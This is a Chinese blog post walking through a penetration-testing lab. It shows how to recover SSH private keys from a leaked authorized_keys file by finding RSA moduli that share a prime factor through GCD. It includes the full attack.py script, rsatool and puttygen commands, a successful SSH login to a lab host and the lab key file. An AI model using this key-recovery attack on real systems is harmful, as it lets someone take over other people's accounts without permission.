• 在一个机器上获取大量PublicKey后的私钥恢复方法


    渗透测试过程中,有时候会在某个未授权访问漏洞中获取authorized_keys文件,里面有大量账户用于免密登录的PublicKey,这个时候如何进行下一步渗透?

    可以考虑rsa碰撞的方式,找到公用p因子的两个公钥,从而逐步恢复出私钥(具体原理不太明白,据说来自一篇论文:https://factorable.net/weakkeys12.extended.pdf),本文方法学习自:https://hackso.me/rsa-1-walkthrough/,手动重写了原文中的脚本,全部改为python执行,该脚本python2和python3兼容

    *注:这里需要rsa的基础知识,最起码需要知道rsa加密算法的两个个因子:p、q 分别是什么

    *注:这种方法成功率相对较低,目前计算机性能算力算法的综合作用下,找到公用p因子的可能性极低,所以想要成功需要有一个前提,authorized_keys文件中有大量公钥

    一、获取authorized_keys文件,并执行以下脚本。----测试authorized_key文件和和attack.py脚本附在文末

    该脚本可以算出哪两个公钥共用了一个p,并显示出其对应的q是什么

    root@kali:~/Desktop/Pentration# python3 attack.py 
    [('2', '4', 154417972435807005071073724522212444390586453823829143415803831059147415798074017502040314003763421243774270757922304211573942665136361376688205405360960917939484579087307177536921412011411703961828583167653172004502917347120641950199480561070177933253465927358617195370782866425595898798109004224439814798057, 154138482778403634422324585381094741396112094157924874391263694520821571222861298674105765179306306537493034017749692130071107610613435921888902004138078680460276016821583678249932808105907339203963186655685583329163374562641235896970977501756291570424272228689701476926803652905250957577229144433204452772127, 153278113332014430314822533712203891727299288836706793970670250689211994721080531031391472583116454287125291108401187935648312751844041461411234500935073837231805656247842743814066543045935616374230913460500896653516311833291062554618374636514900539486293512925569339760306744210644153977272176465759656466897)]

    可以看到第二和第四条公钥共用了一个p

    二、计算两个公钥对应的RSA私钥

    经过第一步,已经将SSH公钥转换为了RSA公钥,这里根据所得p和q可以计算出两个公钥对应的RSA私钥,需要用到rsatools

    root@kali:~/Desktop/Pentration/rsatool# ./rsatool.py -o user2.pem -p 154417972435807005071073724522212444390586453823829143415803831059147415798074017502040314003763421243774270757922304211573942665136361376688205405360960917939484579087307177536921412011411703961828583167653172004502917347120641950199480561070177933253465927358617195370782866425595898798109004224439814798057 -q 154138482778403634422324585381094741396112094157924874391263694520821571222861298674105765179306306537493034017749692130071107610613435921888902004138078680460276016821583678249932808105907339203963186655685583329163374562641235896970977501756291570424272228689701476926803652905250957577229144433204452772127
    root@kali:~/Desktop/Pentration/rsatool# ./rsatool.py -o user4.pem -p 154417972435807005071073724522212444390586453823829143415803831059147415798074017502040314003763421243774270757922304211573942665136361376688205405360960917939484579087307177536921412011411703961828583167653172004502917347120641950199480561070177933253465927358617195370782866425595898798109004224439814798057 -q 153278113332014430314822533712203891727299288836706793970670250689211994721080531031391472583116454287125291108401187935648312751844041461411234500935073837231805656247842743814066543045935616374230913460500896653516311833291062554618374636514900539486293512925569339760306744210644153977272176465759656466897

    三、生成两个公钥对应的SSH私钥

    经过第二步生成了两个公钥对应的RSA私钥,接下来就可以生成SSH私钥,用于免密登录

    root@kali:~/Desktop/Pentration/rsatool# puttygen user2.pem -o user2 -O private-openssh-new
    root@kali:~/Desktop/Pentration/rsatool# puttygen user4.pem -o user4 -O private-openssh-new

    生成的user2和user4就是我们需要的SSH私钥

    四、免密登录主机

    root@kali:~/Desktop/Pentration/rsatool# ssh -i user2 user2@192.168.109.248
    Last login: Sat Jan  5 01:46:12 2019 from 192.168.109.131
    OpenBSD 6.3 (GENERIC) #100: Sat Mar 24 14:17:45 MDT 2018
    
    Welcome to OpenBSD: The proactively secure Unix-like operating system.
    
    Please use the sendbug(1) utility to report bugs in the system.
    Before reporting a bug, please try to reproduce it with the latest
    version of the code.  With bug reports, please try to ensure that
    enough information to reproduce the problem is enclosed, and if a
    known fix for it exists, include that as well.
    
    rsafun$ 

    已经成功登录

    *附件

    1、attack.py

    #attack.py
    from itertools import combinations
    from fractions import gcd
    import subprocess
    import os
    
    file=open("authorized_keys")
    pubKeylist=file.readlines()
    tem1Name=1
    for i in pubKeylist:
        tem1Name_t=str(tem1Name)
        file1_t=open("user"+tem1Name_t,'w')
        file1_t.write(i)
        file1_t.close()
        tem1Name+=1
    file.close()
    #print(tem1Name)
    
    for i in range(1,tem1Name):
        cmd="ssh-keygen -e -m PEM -f user"+str(i)+" | "+"openssl rsa -RSAPublicKey_in -modulus -noout"
        rdata=subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.STDOUT).stdout.readlines()
        for j in rdata:
            j=bytes.decode(j).split('=')[1]
            tem2Name=str(i)
            file2_t=open("user"+tem2Name+".n",'w')
            file2_t.write(j)
            file2_t.close()
    
    list = []
    dict = {}
    result = []
    
    # build list
    for i in range(9):
      list.append(str(i+1))
    
    # build dictionary
    for x in list:
      dict[x] = int(open("user"+x+".n", 'r').read(), 16)
    
    # gcd
    for (i, j) in combinations(list, 2):
      p = gcd(dict[i], dict[j])
      if (p != 1):
        result.append((i, j, p, int(dict[i]//p), int(dict[j]//p)))
        break
    
    print(result)
    os.system("rm user*")

    2、authorized_keys

    ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC4aOHSLLqN+odwP6G1GdxqJ+I/e1PuX3EbFe64snwy7IFAY8WrPBEsIqEWesOqUXzBI7G6YbiR13nen0XWqZtSn1yBbt1U1a8M+19phOVyo4Awx/wTvpG0EPYLI3H9J5aIOcBntXo6rrpiidMT2jYthUxwKKNUUHkbmLJ6QP9jNpCGZwm2CXO0GLmnFBYbE+53xKbX1DVD7aEiRxi62XhoUsepAsUJOzt4enAp3WuyMz9f8IlWg2BUiUFqlVImNRm9UuuoXhsBItLOcF0DHBgRZN4cFZyZO2x73SOJ5oJIikA3NhJ9rYwrE01HsKwYxhqXB94rM/SBTcJ5c6xes6Er user1@rsafun
    ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8i9Nk6Rpd6SlRG/FSPy/M8OXVEO/akLMVaNNJEpejOQ/ekdlTKyBMb4pIEwoKpu+PTTeAzigSNNTNg1TONyK0CsPJ3Uj1oJIrJXYNAFm7kxqQD2pKDIGB0hYj1pwivTLnNhh5cnS7Mnm9ijJPHQ8TEyade9a0v9Ps4BAFEIl9HfjkFm/KDTcQjuBjPTaYgazY5b/EHyfLf2deHeFT4AwzWBa7NdiFKKn5eXComWYIiBcUYWRf0ROd/Tx2aF3Q/hxmbS8ImR4l0ZRdsh6V+gmQzp2eAzNeN9QmJzF2gaDQGZBcKf0gpA8gj0prIcnLFctI6seS+an+N6yUW/bwNBM3 user2@rsafun
    ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCQ8ZjTDIcdjaAwSTS1u83FspC6iVba2a1W1jS+UVw+zrxc06xEeTBmdt4p0J9cWCK97pMrBR+dquuLikaSxfI6BxhZY+6MKTnghjI8MiktgpjEOJNA6rfOJzBoIvvQr4E3LJu0gRVDLoSoseDI1Vb9d5AwKQTjGSXGofIpsNzSrwLgu4JKvZAjIfvv/z0bk5VwBmjtJVntlMOBkPyD6ZuGoiWacUH8AFe2lT9h++G6IoIznPQCrIfeKUrIRwbWJWqTumy8RDCKVgTUUYszkq/r1/wAsR1HhZJVon/JczRsZ3ZZL84Zpja0EuYFZKjPgHsewN3pnUEHzWR4b9bCu8dz user3@rsafun
    ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7fmeWcwd24gYuSYBgQmO8mr394YsLYvVN46pGPvjEvpLwEXJ/K6JoLYpBX6EKEqj8mvx04YSy5IsZAjYbraRbhtpOmLXRBSOPwnhzUUcBHQANkKpq5pdJrEdD3xzG0CuHF80P0HY9tG/ZXY8J+LJ+LWyL4H0upWRGTcjGm7fZxyRVg2tI2gLPlN3zHpBji92nQ+CXyJPLOFhq8+/fls143tkJ3LissqgOPnLTQkdm6H9XbaWcgLao7ALXEgyXKWMZrMdEbpBiqOsTyBpwpIM3A7iAPu/1QqsPqnwKUbH7z6zn8TbfoPABN+MbvnEmj4jALqhDAnWAaMfq0yUWm5k5 user4@rsafun
    ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCge/tLWGuAwvfAZ6jZUVQ+JzhdSlanJduRV8urB94AlP82Rm5y1LMuAy70z0VTE2SNzMG2yqAFGtbfUvkoqfD5WnWG9oHJaoiaJnfxvOLKgNEztTTAdFdMDLHkD3hh4NdxH7aZxQIxHUWtKOhuZ8h73toH7tAkChPkaSO6G79hb2pciCP//TnJfc59Fd5fNQEdROQ8Ekp1mONrqCJAgKJn5BvzXeGAwpxbLpvyJFcW6uTj98GoE9qPSItt5/DPn9oVOX1RgTQjSDqZZq2m1rLtLIs9RIYu/xPTWQ2AsAHvrTCDoNo00ebQPDFz0MzTP8bIyw8ObpoWtdqkEUqi35/r user5@rsafun
    ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD00XwLgzJK9Ocwzid87PcnLf7DkZdoggvl624q0vSMKKDNpbj4DNdL8naR5XEoqx2t265AQcUyc2JOQKqMbPuyWdjX6GbYkAa7quWVh0B6W+7qoVLFWmJOi63Rzyrm/TRoHBjJI8jN6bBVoINnm7q0sjJw3xCYEACVR5CM+BLc9sNaVbRmsS1Nu434QeJ4GEiEcdf9LdjvUSZAClAeXcZ6W5hnGg2GCc9Rbo3eFfeXj7A8pk7VZKxhdACnOcYRcAIVUOoPHQUgE4BDTDPKDA5tM7Bf9aGfaIw2j9OnzpYUfen8DGK/LzktpBn10In2R05HXojO6pMrLvJ+81rGqy3x user6@rsafun
    ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDlKXFK6oJ4dJtesy2EwTjaq3HpXsvEYraPynrz4zFc1N8KnPiRdZBlX6opIQsxwseUUQXso+0VQ9v4nG3q0/bzKjmFJwg6j16M+P7KndYr1MM8U2tSQ+YOibPJ2FONF9VlPHF3mFviUI+fYGgb1p47Dxj/SQ5s1vuBk4Lf/FTJV3qAEvhwBYA7HysO83SBwSBA+DS64BAWXofZxpOKXET4Q+IKT3d7hIVaFJgWi9q1NRFeHZ0B3AtlrQ+QCppMiZU4aDwl5wGYuV+4QDlkTtQCwilaa2kc5ujbzJhCeww3pMSa0cr5G90a6lwf+GkX+NoumwsoqxgRgj9i1o2BxdKp user7@rsafun
    ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5bur6r9Kq2SB4YGmSFI14K6X8o4LAM6ZQLoMgp52W6NUz2TUFTAXdMkMVBS+dG2wSbcyuZ59Cc6vi2ehQViJmx1vzev2Ejj+bQIPagh6SU/oWRa/KiqlYdzjQsntS5IVQD4WX0kq7zOKDoNLqUhkgmZDBdISN/TRO+iEmKLKowoJlR5EDudLJqY+lZ6wwNtgwG4tMK5c/Czx41pIm1OKw09c23FD0/GGXv0JDBplku+Jjr1CNc+M7QkeVSDXwf8BzkNzWkkQnGxwJQF0ufVuuzkZ9C9Ub0MTvDzMcefiWz3oSkVWz5HeFe2ROS2rBFYUm5M48TrsD5bLYEn6i4LDh user8@rsafun
    ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDUC0NKyGoR1EqOS1suQK0YfitFIt0lFkpwKVYVP4YD86aSiPqpWI6rRsLBevGxOfDdRFHqMmzx4S0tVJfYErs7O7X20xWy6oJJRX67h1QghDZOa8hWEFPSr2qlOhNTvfp9yJbTKvCzStSYN0AR81MiuLn6uSmr6N2LUU02mmA1JmuZlO/ilqU7/fECNY9Dl/hrX7oIqvbpxXZDfxa25PQqy9uTrZe71sCkBkdZ11qj+4hkWPUWrhZgosJXJb61h9QGbmhzte3YyJ6RoEzz3ozFamYBzuyszX/4Ne4juBXzXoD5+En+kFIMnfNk5bVYeD4XG6a8jDDcKzsFrvWZ7zgD user9@rsafun
  • 相关阅读:
    windows下Redis安装及使用
    DQL、DML、DDL、DCL的概念与区别
    成长路上破局思维:工具化时间管理
    git push 本地分支与远程分支关联
    vue elementUI table表格列动态渲染的案例
    flutter 页面频繁刷新节省页面性能的组件RepaintBoundary
    elementUI Table表格表头自定义
    vue 项目添加echarts图表
    flutter 高斯实现模糊
    flutter 监听软键盘的弹出和关闭
  • 原文地址:https://www.cnblogs.com/zlgxzswjy/p/10237397.html
Copyright © 2020-2023  润新知